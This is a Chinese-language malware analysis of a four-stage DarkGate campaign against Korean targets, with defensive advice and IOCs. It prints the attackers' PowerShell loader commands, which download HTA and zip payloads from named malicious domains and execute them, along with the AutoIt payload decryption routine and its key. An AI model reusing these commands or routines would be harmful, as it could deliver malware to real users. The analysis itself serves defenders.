针对韩国实体的载荷投递,多阶段链路执行,通过二进制“.a3x”文件释放和执行Darkgate恶意软件
字数 2178 2025-08-22 12:23:13

Darkgate恶意软件多阶段攻击链分析

一、攻击概述

本次分析的是一个针对韩国实体的多阶段攻击链,通过精心设计的.html文件作为初始载荷,经过多个阶段最终释放并执行Darkgate恶意软件。攻击链设计精巧,使用了多种不常见的技术手段。

二、攻击流程总览

  1. 第一阶段:恶意HTML附件下载者
  2. 第二阶段:HTA文件下载者
  3. 第三阶段:PowerShell脚本下载者
  4. 第四阶段:AutoIt3脚本释放执行Darkgate远控

三、详细技术分析

3.1 第一阶段:恶意HTML附件

初始载体

  • 钓鱼邮件携带.html附件
  • 邮件包含诱饵描述信息诱导用户打开

执行过程

  1. 运行后显示伪装成MS Word的界面
  2. 提示用户点击"How to fix"按钮查看"文档"
  3. 点击按钮触发download事件,将恶意PowerShell命令复制到剪贴板

PowerShell代码分析

ipconfig /flushdns

$CN = 'c:\\users\\public\\wa.hta';
invoke-webrequest -uri hxxps://linktoxic34.com/wp-content/themes/twentytwentytwo/dark.hta -outfile $CN;
start-process $CN;

[System.Reflection.Assembly]::LoadWithPartialName("System.Windows.Forms");
[System.Windows.Forms.MessageBox]::Show("The operation completed successfully, please reload the page", "System", 0, 64);
clear-host;

功能解析

  1. 刷新DNS缓存
  2. 从C2下载HTA文件到c:\users\public\wa.hta
  3. 执行下载的HTA文件
  4. 弹出成功提示框迷惑用户
  5. 清空剪贴板内容

3.2 第二阶段:HTA文件下载者

HTA文件特性

  • HTA(HTML Application)允许使用HTML、JavaScript和VBScript创建本地Windows应用
  • 攻击者利用其执行恶意VBScript脚本

恶意行为

  • 隐藏任务栏执行
  • 构造并执行PowerShell命令
  • dogmupdate.com/rdyjyany下载下一阶段载荷

3.3 第三阶段:PowerShell脚本下载者

PowerShell脚本内容

ni 'C:/zkdz/' -Type Directory -Force;
cd 'C:/zkdz/';
Invoke-WebRequest -Uri "http://dogmupdate.com/yoomzhda" -OutFile 'file.zip';
Expand-Archive -Path 'file.zip' -DestinationPath 'C:/zkdz/';
start 'AutoIt3.exe' -a 'script.a3x';
attrib +h 'C:/zkdz/'

功能解析

  1. 创建并进入C:/zkdz/目录
  2. 下载file.zip文件
  3. 解压获取script.a3x文件
  4. 使用AutoIt3.exe执行script.a3x
  5. 隐藏C:/zkdz/目录

3.4 第四阶段:AutoIt3脚本分析

文件特性

  • .a3x是编译后的AutoIt脚本
  • 使用AutoIt Extractor工具提取资源

解密逻辑

  • 使用异或和按位取反操作解密载荷
  • 解密密钥为"SFZFQODn"
  • 密文存储在$data变量和单独放置的hex流中

解密函数示例

Func _ENCRYPT($vvalue, $skey)
    $tbyte = DllStructCreate("BYTE")
    Local $s_encrypted
    Local $ikeyalt = BinaryLen($skey)
    
    For $i = 0x1 To $ikeyalt
        $ikeyalt = BitXOR(BinaryMid($skey, $i, 0x1), $ikeyalt)
    Next
    
    For $i = 0x1 To BinaryLen($vvalue)
        $s_encrypted &= Chr(DllStructSetData($tbyte, 0x1, BitNOT(BitXOR(BinaryMid($vvalue, $i, 0x1), $ikeyalt))))
    Next
    
    Return $s_encrypted
EndFunc

最终载荷

  • 解密后为Darkgate恶意软件
  • 创建结构体并调用Windows API函数:
    • VirtualProtect
    • EnumWindows

四、防御建议

  1. 邮件安全

    • 警惕不明来源的HTML附件
    • 对员工进行钓鱼邮件识别培训

  2. 执行控制

    • 限制PowerShell执行权限
    • 监控异常HTA文件执行
    • 限制AutoIt3.exe的使用

  3. 网络防护

    • 拦截已知恶意域名
    • 监控异常DNS请求和Web流量

  4. 终端防护

    • 启用行为检测机制
    • 监控可疑的文件创建和进程执行链

五、IOC指标

文件哈希

第一阶段

  • 8b788345fe1a3e9070e2d2982c1f1eb2 (html)
  • 4b653886093a209c3d86cb43d507a53f (html)
  • 318f00b609039588ce5ace3bf1f8d05f (html)

第二阶段

  • 30e2442555a4224bf15bbffae5e184ee (dark.hta)
  • a77becccca5571c00ebc9e516fd96ce8 (1.hta)

第三阶段

  • 7484931957633b796f165061b0c59794 (rdyjyany)
  • f2e4351aa516a1f2e59ade5d9e7aa1d6 (umkglnks)

第四阶段

  • 404bd47f17d482e139e64d0106b8888d (script.a3x)
  • e0173741b91cabfecd703c20241c1108 (script.a3x)
  • 4d52ea9aa7cd3a0e820a9421d936073f (script.a3x)

恶意域名

  • hxxps://jenniferwelsh[.]com/header.png
  • hxxp://mylittlecabbage[.]net/qhsddxna
  • hxxp://mylittlecabbage[.]net/xcdttafq
  • hxxps://linktoxic34[.]com/wp-content/themes/twentytwentytwo/dark.hta
  • hxxp://dogmupdate[.]com/rdyjyany
  • hxxp://dogmupdate[.]com/yoomzhda
  • hxxps://www.rockcreekdds[.]com/wp-content/1.hta
  • hxxp://flexiblemaria[.]com/umkglnks
  • hxxp://flexiblemaria[.]com/iinkqrwu

六、总结

此攻击链展示了现代恶意软件攻击的复杂性和多阶段性,从初始的HTML社会工程攻击,到利用多种脚本语言(PowerShell、VBScript、AutoIt)进行多阶段载荷传递,最终释放成熟的Darkgate远控软件。攻击者精心设计了每个阶段的迷惑性和隐蔽性,值得安全团队高度警惕。

Darkgate恶意软件多阶段攻击链分析 一、攻击概述 本次分析的是一个针对韩国实体的多阶段攻击链,通过精心设计的 .html 文件作为初始载荷,经过多个阶段最终释放并执行Darkgate恶意软件。攻击链设计精巧,使用了多种不常见的技术手段。 二、攻击流程总览 第一阶段:恶意HTML附件下载者 第二阶段:HTA文件下载者 第三阶段:PowerShell脚本下载者 第四阶段:AutoIt3脚本释放执行Darkgate远控 三、详细技术分析 3.1 第一阶段:恶意HTML附件 初始载体 : 钓鱼邮件携带 .html 附件 邮件包含诱饵描述信息诱导用户打开 执行过程 : 运行后显示伪装成MS Word的界面 提示用户点击"How to fix"按钮查看"文档" 点击按钮触发download事件,将恶意PowerShell命令复制到剪贴板 PowerShell代码分析 : 功能解析 : 刷新DNS缓存 从C2下载HTA文件到 c:\users\public\wa.hta 执行下载的HTA文件 弹出成功提示框迷惑用户 清空剪贴板内容 3.2 第二阶段:HTA文件下载者 HTA文件特性 : HTA(HTML Application)允许使用HTML、JavaScript和VBScript创建本地Windows应用 攻击者利用其执行恶意VBScript脚本 恶意行为 : 隐藏任务栏执行 构造并执行PowerShell命令 从 dogmupdate.com/rdyjyany 下载下一阶段载荷 3.3 第三阶段:PowerShell脚本下载者 PowerShell脚本内容 : 功能解析 : 创建并进入 C:/zkdz/ 目录 下载 file.zip 文件 解压获取 script.a3x 文件 使用AutoIt3.exe执行script.a3x 隐藏 C:/zkdz/ 目录 3.4 第四阶段:AutoIt3脚本分析 文件特性 : .a3x 是编译后的AutoIt脚本 使用AutoIt Extractor工具提取资源 解密逻辑 : 使用异或和按位取反操作解密载荷 解密密钥为"SFZFQODn" 密文存储在$data变量和单独放置的hex流中 解密函数示例 : 最终载荷 : 解密后为Darkgate恶意软件 创建结构体并调用Windows API函数: VirtualProtect EnumWindows 四、防御建议 邮件安全 : 警惕不明来源的HTML附件 对员工进行钓鱼邮件识别培训 执行控制 : 限制PowerShell执行权限 监控异常HTA文件执行 限制AutoIt3.exe的使用 网络防护 : 拦截已知恶意域名 监控异常DNS请求和Web流量 终端防护 : 启用行为检测机制 监控可疑的文件创建和进程执行链 五、IOC指标 文件哈希 第一阶段 : 8b788345fe1a3e9070e2d2982c1f1eb2 (html) 4b653886093a209c3d86cb43d507a53f (html) 318f00b609039588ce5ace3bf1f8d05f (html) 第二阶段 : 30e2442555a4224bf15bbffae5e184ee (dark.hta) a77becccca5571c00ebc9e516fd96ce8 (1.hta) 第三阶段 : 7484931957633b796f165061b0c59794 (rdyjyany) f2e4351aa516a1f2e59ade5d9e7aa1d6 (umkglnks) 第四阶段 : 404bd47f17d482e139e64d0106b8888d (script.a3x) e0173741b91cabfecd703c20241c1108 (script.a3x) 4d52ea9aa7cd3a0e820a9421d936073f (script.a3x) 恶意域名 hxxps://jenniferwelsh[ . ]com/header.png hxxp://mylittlecabbage[ . ]net/qhsddxna hxxp://mylittlecabbage[ . ]net/xcdttafq hxxps://linktoxic34[ . ]com/wp-content/themes/twentytwentytwo/dark.hta hxxp://dogmupdate[ . ]com/rdyjyany hxxp://dogmupdate[ . ]com/yoomzhda hxxps://www.rockcreekdds[ . ]com/wp-content/1.hta hxxp://flexiblemaria[ . ]com/umkglnks hxxp://flexiblemaria[ . ]com/iinkqrwu 六、总结 此攻击链展示了现代恶意软件攻击的复杂性和多阶段性,从初始的HTML社会工程攻击,到利用多种脚本语言(PowerShell、VBScript、AutoIt)进行多阶段载荷传递,最终释放成熟的Darkgate远控软件。攻击者精心设计了每个阶段的迷惑性和隐蔽性,值得安全团队高度警惕。